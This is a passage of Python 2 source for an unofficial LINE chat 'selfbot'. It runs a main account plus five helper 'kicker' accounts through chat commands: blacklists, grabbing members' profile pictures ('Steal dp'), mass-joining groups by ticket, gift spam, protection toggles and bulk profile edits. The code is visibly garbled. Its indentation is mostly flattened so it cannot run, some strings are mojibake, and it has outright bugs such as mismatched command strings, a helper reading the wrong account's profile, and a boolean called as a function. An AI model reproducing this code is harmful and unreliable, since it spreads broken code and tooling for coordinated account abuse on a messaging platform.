if wait["lang"] == "JP":
cl.sendText(msg.to,helpMessage)
else:
cl.sendText(msg.to,helpMessage)
#----------------------------------------------
elif "Me @" in msg.text:
msg.contentType = 13
_name = msg.text.replace("Me @","")
_nametarget = _name.rstrip(' ')
gs = cl.getGroup(msg.to)
for g in gs.members:
if _nametarget == g.displayName:
msg.contentMetadata = {'mid': g.mid}
cl.sendMessage(msg)
else:
pass
#-----------------------------------------------
elif msg.text in ["Conban","Contactban","Contact ban"]:
if wait["blacklist"] == {}:
cl.sendText(msg.to,"Tidak Ada Blacklist")
else:
cl.sendText(msg.to,"Daftar Blacklist")
h = ""
for i in wait["blacklist"]:
h = cl.getContact(i)
M = Message()
M.to = msg.to
M.contentType = 13
M.contentMetadata = {'mid': i}
cl.sendMessage(M)
#----------------------------------------------------------
elif "M @" in msg.text:
_name = msg.text.replace("M @","")
_nametarget = _name.rstrip(' ')
gs = cl.getGroup(msg.to)
for g in gs.members:
if _nametarget == g.displayName:
cl.sendText(msg.to, g.mid)
else:
pass
#----------------------------------------------------------
elif msg.text in ["group","รายชื่อ"]:
gid = cl.getGroupIdsJoined()
h = ""
for i in gid:
h += "[★] %s\n" % (cl.getGroup(i).name +"→["+str(len(cl.getGroup(i).members))+"]")
cl.sendText(msg.to,"▒▒▓█[List Group]█▓▒▒\n"+ h +"Total Group =" +"["+str(len(gid))+"]")
#-----------------------------------------------
elif "Steal dp @" in msg.text:
nama = msg.text.replace("Steal dp @","")
target = nama.rstrip(' ')
van = cl.getGroup(msg.to)
for linedev in van.members:
if target == linedev.displayName:
midddd = cl.getContact(linedev.mid)
PATH = "http://dl.profile.line-cdn.net/" + midddd.pictureStatus
cl.sendImageWithURL(msg.to,PATH)
#================================================
elif msg.text in ["bot"]:
msg.contentType = 13
msg.contentMetadata = {'mid': kimid}
ki.sendMessage(msg)
msg.contentType = 13
msg.contentMetadata = {'mid': ki2mid}
ki2.sendMessage(msg)
msg.contentType = 13
msg.contentMetadata = {'mid': ki3mid}
ki3.sendMessage(msg)
msg.contentType = 13
msg.contentMetadata = {'mid': ki4mid}
ki4.sendMessage(msg)
msg.contentType = 13
msg.contentMetadata = {'mid': ki5mid}
ki5.sendMessage(msg)
elif "As1" == msg.text:
msg.contentType = 13
msg.contentMetadata = {'mid': kimid}
ki.sendMessage(msg)
elif "As2" == msg.text:
msg.contentType = 13
msg.contentMetadata = {'mid': ki2mid}
ki2.sendMessage(msg)
elif "As3" == msg.text:
msg.contentType = 13
msg.contentMetadata = {'mid': ki3mid}
ki3.sendMessage(msg)
elif "As4" == msg.text:
msg.contentType = 13
msg.contentMetadata = {'mid': ki4mid}
ki4.sendMessage(msg)
elif "As5" == msg.text:
msg.contentType = 13
msg.contentMetadata = {'mid': ki5mid}
ki5.sendMessage(msg)
elif msg.text in ["Bot1 Gift","As1 gift"]:
msg.contentType = 9
msg.contentMetadata={'PRDID': '3b92ccf5-54d3-4765-848f-c9ffdc1da020',
'PRDTYPE': 'THEME',
'MSGTPL': '2'}
msg.text = None
ki.sendMessage(msg)
elif msg.text in ["Gift","gift"]:
msg.contentType = 9
msg.contentMetadata={'PRDID': '3b92ccf5-54d3-4765-848f-c9ffdc1da020',
'PRDTYPE': 'THEME',
'MSGTPL': '3'}
msg.text = None
cl.sendMessage(msg)
elif msg.text in ["Bot2 Gift","As2 gift"]:
msg.contentType = 9
msg.contentMetadata={'PRDID': '3b92ccf5-54d3-4765-848f-c9ffdc1da020',
'PRDTYPE': 'THEME',
'MSGTPL': '3'}
msg.text = None
ki2.sendMessage(msg)
elif msg.text in ["Bot3 Gift","As3 gift"]:
msg.contentType = 9
msg.contentMetadata={'PRDID': '3b92ccf5-54d3-4765-848f-c9ffdc1da020',
'PRDTYPE': 'THEME',
'MSGTPL': '4'}
msg.text = None
ki3.sendMessage(msg)
elif msg.text in ["Bot4 Gift","As4 gift"]:
msg.contentType = 9
msg.contentMetadata={'PRDID': '3b92ccf5-54d3-4765-848f-c9ffdc1da020',
'PRDTYPE': 'THEME',
'MSGTPL': '5'}
msg.text = None
ki4.sendMessage(msg)
elif msg.text in ["Allgift","All Gift"]:
msg.contentType = 9
msg.contentMetadata={'PRDID': 'a0768339-c2d3-4189-9653-2909e9bb6f58',
'PRDTYPE': 'THEME',
'MSGTPL': '12'}
msg.text = None
cl.sendMessage(msg)
ki.sendMessage(msg)
ki2.sendMessage(msg)
ki3.sendMessage(msg)
ki4.sendMessage(msg)
ki5.sendMessage(msg)
# if "MENTION" in msg.contentMetadata.keys() != None:
# if wait['detectMention'] == True:
# contact = kr.getContact(msg.from_)
# image = "http://dl.profile.line-cdn.net/" + contact.pictureStatus
# cName = contact.displayName
# msg.text1 = "@"+cName+" "
# balas = ["💓อย่าแท้กสิเตง💓"]
# ret_ = msg.text1 + random.choice(balas)
# name = re.findall(r'@(\w+)', msg.text)
# mention = ast.literal_eval(msg.contentMetadata["MENTION"])
# mentionees = mention['MENTIONEES']
# for mention in mentionees:
# if mention['M'] in Bots:
# kr.sendText(msg.to,ret_)
# kr.sendImageWithURL(msg.to,image)
# break
elif msg.text in ["Cancel","cancel","ยกเชิญ","ยก"]:
if msg.from_ in admin:
if msg.toType == 2:
group = cl.getGroup(msg.to)
if group.invitee is not None:
gInviMids = [contact.mid for contact in group.invitee]
cl.cancelGroupInvitation(msg.to, gInviMids)
                        else:
                            if wait["lang"] == "JP":
                                cl.sendText(msg.to,"No invites👈")
                            else:
                                cl.sendText(msg.to,"There are no pending invitations👈")
                    else:
                        if wait["lang"] == "JP":
                            cl.sendText(msg.to,"No pending invitations👈")
                        else:
                            cl.sendText(msg.to,"No invitations")
elif "Contact" == msg.text:
msg.contentType = 13
msg.contentMetadata = {'mid': msg.to}
cl.sendMessage(msg)
elif "As1 mid" == msg.text:
ki.sendText(msg.to,kimid)
elif "As2 mid" == msg.text:
ki2.sendText(msg.to,ki2mid)
elif "As3 mid" == msg.text:
ki3.sendText(msg.to,ki3mid)
elif "As4 mid" == msg.text:
ki4.sendText(msg.to,ki4mid)
elif "As5 mid" == msg.text:
ki5.sendText(msg.to,ki5mid)
elif "All mid" == msg.text:
ki.sendText(msg.to,kimid)
ki2.sendText(msg.to,ki2mid)
ki3.sendText(msg.to,ki3mid)
ki4.sendText(msg.to,ki4mid)
ki5.sendText(msg.to,ki5mid)
elif "Mic:" in msg.text:
mmid = msg.text.replace("Mic:","")
msg.contentType = 13
msg.contentMetadata = {"mid":mmid}
cl.sendMessage(msg)
elif "Timeline: " in msg.text:
tl_text = msg.text.replace("Timeline: ","")
cl.sendText(msg.to,"line://home/post?userMid="+mid+"&postId="+cl.new_post(tl_text)["result"]["post"]["postInfo"]["postId"])
elif "Allname: " in msg.text:
string = msg.text.replace("Allname: ","")
if len(string.decode('utf-8')) <= 20:
profile = ki.getProfile()
profile.displayName = string
ki.updateProfile(profile)
if len(string.decode('utf-8')) <= 20:
profile = ki2.getProfile()
profile.displayName = string
ki2.updateProfile(profile)
if len(string.decode('utf-8')) <= 20:
profile = ki3.getProfile()
profile.displayName = string
ki3.updateProfile(profile)
if len(string.decode('utf-8')) <= 20:
profile = ki4.getProfile()
profile.displayName = string
ki4.updateProfile(profile)
if len(string.decode('utf-8')) <= 20:
profile = ki5.getProfile()
profile.displayName = string
ki5.updateProfile(profile)
elif "Allbio: " in msg.text:
string = msg.text.replace("Allbio: ","")
if len(string.decode('utf-8')) <= 500:
profile = ki.getProfile()
profile.statusMessage = string
ki.updateProfile(profile)
if len(string.decode('utf-8')) <= 500:
profile = ki2.getProfile()
profile.statusMessage = string
ki2.updateProfile(profile)
if len(string.decode('utf-8')) <= 500:
profile = ki3.getProfile()
profile.statusMessage = string
ki3.updateProfile(profile)
if len(string.decode('utf-8')) <= 500:
profile = ki4.getProfile()
profile.statusMessage = string
ki4.updateProfile(profile)
if len(string.decode('utf-8')) <= 500:
profile = ki5.getProfile()
profile.statusMessage = string
ki5.updateProfile(profile)
#---------------------------------------------------------
elif "Name:" in msg.text:
string = msg.text.replace("Name:","")
if len(string.decode('utf-8')) <= 20:
profile = cl.getProfile()
profile.displayName = string
cl.updateProfile(profile)
cl.sendText(msg.to,"The name " + string + " I did NI change。")
elif "Name Bot" in msg.text:
string = msg.text.replace("Name Bot","")
if len(string.decode('utf-8')) <= 20:
profile = cl.getProfile()
profile.displayName = string
ki.updateProfile(profile)
ki2.updateProfile(profile)
ki3.updateProfile(profile)
ki4.updateProfile(profile)
ki5.updateProfile(profile)
cl.sendText(msg.to,"The name " + string + " I did NI change。")
#---------------------------------------------------------
elif "K1 upname:" in msg.text:
string = msg.text.replace("K1 up name:","")
if len(string.decode('utf-8')) <= 20:
profile = ki.getProfile()
profile.displayName = string
ki.updateProfile(profile)
ki.sendText(msg.to,"The name " + string + " I did NI change。")
#--------------------------------------------------------
elif "K2 upname:" in msg.text:
string = msg.text.replace("K2 up name:","")
if len(string.decode('utf-8')) <= 20:
profile = ki2.getProfile()
profile.displayName = string
ki2.updateProfile(profile)
ki2.sendText(msg.to,"The name " + string + " I did NI change。")
#--------------------------------------------------------
elif "K3 upname:" in msg.text:
string = msg.text.replace("K3 up name:","")
if len(string.decode('utf-8')) <= 20:
profile = ki3.getProfile()
profile.displayName = string
ki3.updateProfile(profile)
ki3.sendText(msg.to,"The name " + string + " I did NI change。")
#--------------------------------------------------------
elif "K4 upname:" in msg.text:
string = msg.text.replace("K4 up name:","")
if len(string.decode('utf-8')) <= 20:
profile = ki4.getProfile()
profile.displayName = string
ki4.updateProfile(profile)
ki4.sendText(msg.to,"The name " + string + " I did NI change。")
#--------------------------------------------------------
elif "K5 upname:" in msg.text:
string = msg.text.replace("K5 up name:","")
if len(string.decode('utf-8')) <= 20:
profile = ki3.getProfile()
profile.displayName = string
ki5.updateProfile(profile)
ki5.sendText(msg.to,"The name " + string + " I did NI change。")
#--------------------------------------------------------
#--------------------------------------------------------
elif msg.text.lower() == 'allin':
Ticket = cl.reissueGroupTicket(msg.to)
invsend = 0.22222
G = cl.getGroup(msg.to)
ginfo = cl.getGroup(msg.to)
G.preventJoinByTicket = False
cl.updateGroup(G)
ki.acceptGroupInvitationByTicket(msg.to,Ticket)
time.sleep(0.021)
ki2.acceptGroupInvitationByTicket(msg.to,Ticket)
time.sleep(0.011)
ki3.acceptGroupInvitationByTicket(msg.to,Ticket)
time.sleep(0.011)
ki4.acceptGroupInvitationByTicket(msg.to,Ticket)
time.sleep(0.011)
ki5.acceptGroupInvitationByTicket(msg.to,Ticket)
time.sleep(0.011)
G = cl.getGroup(msg.to)
ginfo = cl.getGroup(msg.to)
G.preventJoinByTicket = True
random.choice(KAC).updateGroup(G)
print "kicker ok"
G.preventJoinByTicket(G)
random.choice(KAC).updateGroup(G)
#-----------------------------------------------------
elif msg.text in ["Notifed on","เปิดแจ้งเตือน","M on"]:
if msg.from_ in admin:
if wait["Notifed"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"All Notifed On\n\nเปิดเเจ้งเเตือนของค���ณเเล้ว")
else:
cl.sendText(msg.to,"Done\n\nเปิดเเจ้งเเตือนของคุณเเล้ว")
else:
wait["Notifed"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"All Notifed On\n\nเปิดเเจ้งเเตือนของคุณเเล้ว")
else:
cl.sendText(msg.to,"Done\n\nเปิดเเจ้งเเตือนของคุณเเล้ว")
elif msg.text in ["Notifed off","ปิดแจ้งเตือน","M off"]:
if msg.from_ in admin:
if wait["Notifed"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"All Notifed Off\n\nปิดเเจ้งเเตือนของคุณเเล้ว")
else:
cl.sendText(msg.to,"Done\n\nปิดเเจ้งเเตือนของคุณเเล้ว")
else:
wait["Notifed"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"All Notifed Off\n\nปิดเเจ้งเเตือนของคุณเเล้ว")
else:
cl.sendText(msg.to,"Done\n\nปิดเเจ้งเเตือนของคุณเเล้ว")
#======================================================#
#-----------------------------------------------
elif "Mic: " in msg.text:
mmid = msg.text.replace("Mic: ","")
msg.contentType = 13
msg.contentMetadata = {"mid":mmid}
cl.sendMessage(msg)
elif msg.text.lower() == 'contact on':
if wait["contact"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Sudah On")
else:
cl.sendText(msg.to,"It is already open")
else:
wait["contact"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"🌟เปิดอ่านคอนแทคสำเร็จ🌟")
else:
cl.sendText(msg.to,"It is already open ")
elif msg.text.lower() == 'contact off':
if wait["contact"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"sudah off 👈")
else:
cl.sendText(msg.to,"It is already off 👈")
else:
wait["contact"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"off already")
else:
cl.sendText(msg.to,"🌟ปิดอ่านคอนแทคสำเร็จ🌟")
elif msg.text.lower() == 'protect on':
if wait["protect"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Ini sudah on 👈")
else:
cl.sendText(msg.to,"Hal ini sudah terbuka ��")
else:
wait["protect"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"🌟ป้องกันเปิดสำเร็จ🌟")
else:
cl.sendText(msg.to,"It is already On ")
elif msg.text.lower() == 'qrprotect on':
if wait["linkprotect"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Ini sudah on ��")
else:
cl.sendText(msg.to,"Hal ini sudah terbuka 👈")
else:
wait["linkprotect"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"🌟ล็อคลิ้งคิวอาร์โค���ตเปิด🌟")
else:
cl.sendText(msg.to,"It is already On ")
elif msg.text.lower() == 'inviteprotect on':
if wait["inviteprotect"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Ini sudah on 👈")
else:
cl.sendText(msg.to,"Hal ini sudah terbuka 👈")
else:
wait["inviteprotect"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"��ล็อคการเชิญกลุ่มเปิด🌟")
else:
cl.sendText(msg.to,"It is already On ")
elif msg.text.lower() == 'cancelprotect on':
if wait["cancelprotect"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Ini sudah on 👈")
else:
cl.sendText(msg.to,"Hal ini sudah terbuka 👈")
else:
wait["cancelprotect"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"🌟ล็อคยกเลิกเชิญสมาชิกเปิด🌟")
else:
cl.sendText(msg.to,"It is already On ")
elif msg.text in ["Respontag on","Autorespon:on","Respon on","Respon:on"]:
wait['detectMention'] = True
cl.sendText(msg.to,"Auto respon tag On")
elif msg.text in ["Respontag off","Autorespon:off","Respon off","Respon:off"]:
wait['detectMention'] = False
cl.sendText(msg.to,"Auto respon tag Off")
elif msg.text in ["on"]:
wait['group'] = True
cl.sendText(msg.to,"เปิดต้อนรับแร้ว")
elif msg.text in ["off"]:
wait['group'] = False
cl.sendText(msg.to,"ปิดข้อความ")
elif msg.text in ["Sambutan on"]:
if wait["Sambutan"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Sambutan Di Aktifkanヾ(*´∀`*)ノ")
else:
wait["Sambutan"] = True
wait["joinkick"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"Sudah Onヽ(´▽`)/")
elif msg.text in ["Sambutan off"]:
if wait["Sambutan"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Sambutan Di Nonaktifkan( ^∇^)")
else:
wait["Sambutan"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"Sudah Off(p′︵‵。)")
            elif msg.text.lower() == 'join on':
                if wait["autoJoin"] == True:
                    if wait["lang"] == "JP":
                        cl.sendText(msg.to,"Already on 👈")
                    else:
                        cl.sendText(msg.to,"It is already on 👈")
                else:
                    wait["autoJoin"] = True
                    if wait["lang"] == "JP":
                        cl.sendText(msg.to,"🌟Auto-join turned on🌟")
                    else:
                        cl.sendText(msg.to,"It is already on")
elif msg.text in ["Allprotect on","Panick:on"]:
if msg.from_ in admin:
if wait["inviteprotect"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"🌟ล็อคเชิญเปิด🌟")
else:
cl.sendText(msg.to,"🌟ล็อคเชิญเปิด🌟")
else:
wait["inviteprotect"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"🌟ล็อคเชิญเปิด🌟")
if wait["cancelprotect"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"🌟ล็อคยกเลิกเชิญเปิด🌟")
else:
cl.sendText(msg.to,"🌟ล็อคยกเลิกเชิญเปิด🌟")
else:
wait["cancelprotect"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"🌟ล็อคยกเลิกเชิญเปิด🌟")
if wait["protect"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"🌟ป้องกันเปิด🌟")
else:
cl.sendText(msg.to,"🌟ป้องกันเปิด🌟")
else:
wait["protect"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"🌟ป้องกันเปิด🌟")
else:
cl.sendText(msg.to,"🌟ป้องกันเปิด🌟")
if wait["linkprotect"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"🌟ล็อคลิ้งคิวอาร์โค้ตเปิด🌟")
else:
cl.sendText(msg.to,"🌟ล็อคลิ้งคิวอาร์โค้ตเปิด🌟")
else:
wait["linkprotect"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"🌟ล็อคลิ้งคิวอาร์โค้ตเปิด🌟")
else:
cl.sendText(msg.to,"🌟ล็อคลิ้งคิวอาร์โค้ตเปิด🌟")
elif msg.text in ["Allprotect off","Panick:off"]:
if msg.from_ in admin:
if wait["inviteprotect"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"✨ล็อคเชิญปิด✨")
else:
cl.sendText(msg.to,"✨ล็อคเชิญปิด✨")
else:
wait["inviteprotect"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"✨ล็อคเชิญปิด✨")
if wait["cancelprotect"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"✨ป้องกันยกเลิกเชิญปิด✨")
else:
cl.sendText(msg.to,"✨ป้องกันยกเลิกเชิญปิด✨")
else:
wait["cancelprotect"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"✨ป้องกันยกเลิกเชิญปิด✨")
if wait["protect"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"✨ป้องกันปิด✨")
else:
cl.sendText(msg.to,"✨ป้องกันปิด✨")
else:
wait["protect"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"✨ป้องกันปิด✨")
else:
cl.sendText(msg.to,"✨ป้องกันปิด✨")
if wait["linkprotect"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"✨ล็อคลิ้งคิวอาร์โค้ตปิด✨")
else:
cl.sendText(msg.to,"✨ล็อคลิ้งคิวอาร์โค้ตปิด✨")
else:
wait["linkprotect"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"✨ล็อคลิ้งคิวอาร์โค้ตปิด✨")
else:
cl.sendText(msg.to,"✨ล็อคลิ้งคิวอาร์โค้ตปิด✨")
            elif msg.text.lower() == 'join off':
                wait["autoJoin"] = False
                cl.sendText(msg.to,"✨Auto-join off✨")
            elif msg.text in ["Protect off"]:
                wait["protect"] = False
                cl.sendText(msg.to,"✨Protection off✨")
            elif msg.text in ["Qrprotect off","qrprotect off"]:
                wait["linkprotect"] = False
                cl.sendText(msg.to,"✨QR-link lock off✨")
            elif msg.text in ["Inviteprotect off"]:
                wait["inviteprotect"] = False
                cl.sendText(msg.to,"✨Invite lock off✨")
            elif msg.text in ["Cancelprotect off"]:
                wait["cancelprotect"] = False
                cl.sendText(msg.to,"✨Cancel-invite lock off✨")
elif "Gcancel:" in msg.text:
if msg.from_ in admin:
try:
strnum = msg.text.replace("Gcancel:","")
if strnum == "off":
wait["autoCancel"]["on"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"Invitation refused turned off\nTo turn on please specify the number of people and send")
else:
cl.sendText(msg.to,"关了邀请拒绝。要时开请指定人数发送")
else:
num = int(strnum)
wait["autoCancel"]["on"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,strnum + " The group of people and below decided to automatically refuse invitation")
else:
cl.sendText(msg.to,strnum + "使人以下的小组用自动邀请拒绝")
except:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Value is wrong")
else:
cl.sendText(msg.to,"Bizarre ratings")
elif msg.text in ["Leave on","Auto leave: on"]:
if wait["leaveRoom"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"on👈")
else:
cl.sendText(msg.to,"Sudah terbuka ")
else:
wait["leaveRoom"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"Done👈")
else:
cl.sendText(msg.to,"Is already open👈")
elif msg.text in ["Leave off","Auto leave: off"]:
if wait["leaveRoom"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"on👈")
else:
cl.sendText(msg.to,"Sudah off👈")
else:
wait["leaveRoom"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"Done👈")
else:
cl.sendText(msg.to,"Is already close👈")
elif msg.text in ["Share on","share on"]:
if wait["timeline"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Done ")
else:
cl.sendText(msg.to,"Hal ini sudah terbuka👈")
else:
wait["timeline"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"on👈")
else:
cl.sendText(msg.to,"on👈")
elif msg.text in ["Share off","share off"]:
if wait["timeline"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Done👈")
else:
cl.sendText(msg.to,"It is already turned off 👈")
else:
wait["timeline"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"Off👈")
else:
cl.sendText(msg.to,"Off👈")
elif msg.text in ["Welcome:on"]:
if msg.from_ in admin:
if wait["welcomemsg"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"welcome message on\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
cl.sendText(msg.to,"welcome message on\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
wait["welcomesg"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"welcome message on\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
cl.sendText(msg.to,"welcome message on")
elif msg.text in ["Welcome:off"]:
if msg.from_ in admin:
if wait["welcomemsg"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"welcome message off\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
cl.sendText(msg.to,"welcome message off\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
wait["welcomemsg"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"welcome message off\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
cl.sendText(msg.to,"welcome message off\n\n"+ datetime.today().strftime('%H:%M:%S'))
elif msg.text.lower() == 'set':
md = ""
if wait["contact"] == True: md+="☞ Contact → ✔\n"
else: md+="🔚 Contact → ❎\n"
if wait["autoJoin"] == True: md+="☞ Auto Join → ✔\n"
else: md+="🔚 Auto Join → ❎\n"
if wait["autoCancel"]["on"] == True:md+="☞ Auto cancel: " + str(wait["autoCancel"]["members"]) + " → ✔\n"
else: md+="🔚 Group cancel → ❎\n"
if wait["leaveRoom"] == True: md+="☞ Auto leave → ✔\n"
else: md+="🔚 Auto leave → ❎\n"
if wait["timeline"] == True: md+="☞ share → ✔\n"
else:md+="🔚 Share → ❎\n"
if wait["autoAdd"] == True: md+="☞ Auto add → ✔\n"
else:md+="🔚 Auto add → ❎\n"
if wait["commentOn"] == True: md+="☞ Auto komentar → ✔\n"
else:md+="🔚 Auto komentar → ❎\n"
if wait["protect"] == True: md+="☞ Protect → ✔\n"
else:md+="🔚 Protect → ❎\n"
if wait["linkprotect"] == True: md+="☞ Link Protect → ✔\n"
else:md+="🔚 Link Protect → ❎\n"
if wait["inviteprotect"] == True: md+="☞ Invitation Protect → ✔\n"
else:md+="🔚 Invitation Protect → ❎\n"
if wait["cancelprotect"] == True: md+="☞ Cancel Protect → ✔\n"
else:md+="🔚 Cancel Protect → ❎\n"
if wait["likeOn"] == True: md+="☞ Auto like → ✔\n"
else:md+="🔚 Auto like → ❎\n"
if wait["Sambutan"] == True: md+="☞ Sambutan → ✔\n"
else:md+="🔚 Sambutan → ❎\n" + datetime.now().strftime('\n📅%Y/%m/%d 🕛 %H:%M:%S')
cl.sendText(msg.to,md)
msg.contentType = 13
msg.contentMetadata = {'mid': admsa}
cl.sendMessage(msg)
elif msg.text in ["Like on"]:
if wait["likeon"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Done。")
else:
wait["Like on"] = True
if wait["likeon"] == "JP":
cl.sendText(msg.to,"Already。")
elif msg.text in ["Like off"]:
if wait["likeoff"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Done。")
else:
wait["likeoff"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"Already。")
elif msg.text in ["Add on","Add auto on"]:
if wait["autoAdd"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Already On")
else:
cl.sendText(msg.to,"Already On👈")
else:
wait["autoAdd"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"Already On👈")
else:
cl.sendText(msg.to,"Already On👈")
elif msg.text in ["Add off","Add auto off"]:
if wait["autoAdd"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Hal ini sudah off👈")
else:
cl.sendText(msg.to,"Hal ini sudah dimatikan👈")
else:
wait["autoAdd"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"Already Off👈")
else:
cl.sendText(msg.to,"Untuk mengaktifkan-off👈")
elif "Message set: " in msg.text:
wait["message"] = msg.text.replace("Message set: ","")
cl.sendText(msg.to,"We changed the message👈")
elif "Help set: " in msg.text:
wait["help"] = msg.text.replace("Help set: ","")
cl.sendText(msg.to,"We changed the Help👈")
elif "Pesan add: " in msg.text:
wait["message"] = msg.text.replace("Pesan add: ","")
if wait["lang"] == "JP":
cl.sendText(msg.to,"Kami mengubah pesan🛡")
else:
cl.sendText(msg.to,"Change information")
elif msg.text in ["Pesan add cek","Message Confirmation"]:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Additional information is automatically set to the following \n\n" + wait["message"])
else:
cl.sendText(msg.to,"Pesan tambahan otomatis telah ditetapkan sebagai berikut \n\n" + wait["message"])
elif msg.text in ["Change","change"]:
if wait["lang"] =="JP":
wait["lang"] = "TW"
cl.sendText(msg.to,"I changed the language to engglis👈")
else:
wait["lang"] = "JP"
cl.sendText(msg.to,"I changed the language to indonesia👈")
elif "Message set: " in msg.text:
c = msg.text.replace("Message set: ","")
if c in [""," ","\n",None]:
cl.sendText(msg.to,"Is a string that can not be changed👈")
else:
wait["comment"] = c
cl.sendText(msg.to,"This has been changed👈\n\n" + c)
elif "Comment set: " in msg.text:
c = msg.text.replace("Comment set: ","")
if c in [""," ","\n",None]:
cl.sendText(msg.to,"Merupakan string yang tidak bisa diubah👈")
else:
wait["comment"] = c
cl.sendText(msg.to,"Ini telah diubah👈\n\n" + c)
elif msg.text in ["Com on","Com:on","Comment on"]:
if wait["commentOn"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Aku berada di👈")
else:
cl.sendText(msg.to,"To open👈")
else:
wait["commentOn"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"オンã«ã—ã¾ã—ãŸ👈")
else:
cl.sendText(msg.to,"è¦äº†å¼€👈")
elif msg.text in ["Com off"]:
if wait["commentOn"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Hal ini sudah off")
else:
cl.sendText(msg.to,"It is already turned off")
else:
wait["commentOn"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"Off👈")
else:
cl.sendText(msg.to,"To turn off")
elif "Update welcome:" in msg.text:
if msg.from_ in admin:
wait["welmsg"] = msg.text.replace("Update welcome:","")
cl.sendText(msg.to,"update welcome message succes"+ datetime.today().strftime('%H:%M:%S'))
elif msg.text in ["Check welcome message"]:
if msg.from_ in admin:
if wait["lang"] == "JP":
cl.sendText(msg.to,"yor bot message\n\n" + wait["welmsg"])
else:
cl.sendText(msg.to,"The automatic appending information is set as follows。\n\n" + wait["welmsg"])
elif msg.text in ["Com","Comment"]:
cl.sendText(msg.to,"Auto komentar saat ini telah ditetapkan sebagai berikut:👈\n\n" + str(wait["comment"]))
elif msg.text in ["Com Bl"]:
wait["wblack"] = True
cl.sendText(msg.to,"Please send contacts from the person you want to add to the blacklistô€œô€…”👈")
elif msg.text in ["Com hapus Bl"]:
wait["dblack"] = True
cl.sendText(msg.to,"Please send contacts from the person you want to add from the blacklistô€œô€…”👈")
elif msg.text in ["Com Bl cek"]:
if wait["commentBlack"] == {}:
cl.sendText(msg.to,"Nothing in the blacklistô€œ🛡")
else:
cl.sendText(msg.to,"The following is a blacklistô€œ👈")
mc = ""
for mi_d in wait["commentBlack"]:
mc += "・" +cl.getContact(mi_d).displayName + "\n"
cl.sendText(msg.to,mc)
elif msg.text.lower() == 'jam on':
if wait["clock"] == True:
cl.sendText(msg.to,"Sudah On")
else:
wait["clock"] = True
now2 = datetime.now()
nowT = datetime.strftime(now2,"(%H:%M)")
profile = cl.getProfile()
profile.displayName = wait["cName"] + nowT
cl.updateProfile(profile)
cl.sendText(msg.to,"👉Jam on👈")
elif msg.text.lower() == 'jam off':
if wait["clock"] == False:
cl.sendText(msg.to,"Hal ini sudah off🛡")
else:
wait["clock"] = False
cl.sendText(msg.to,"Adalah Off")
elif "Jam say: " in msg.text:
n = msg.text.replace("Jam say: ","")
if len(n.decode("utf-8")) > 30:
cl.sendText(msg.to,"terlalu lama")
else:
wait["cName"] = n
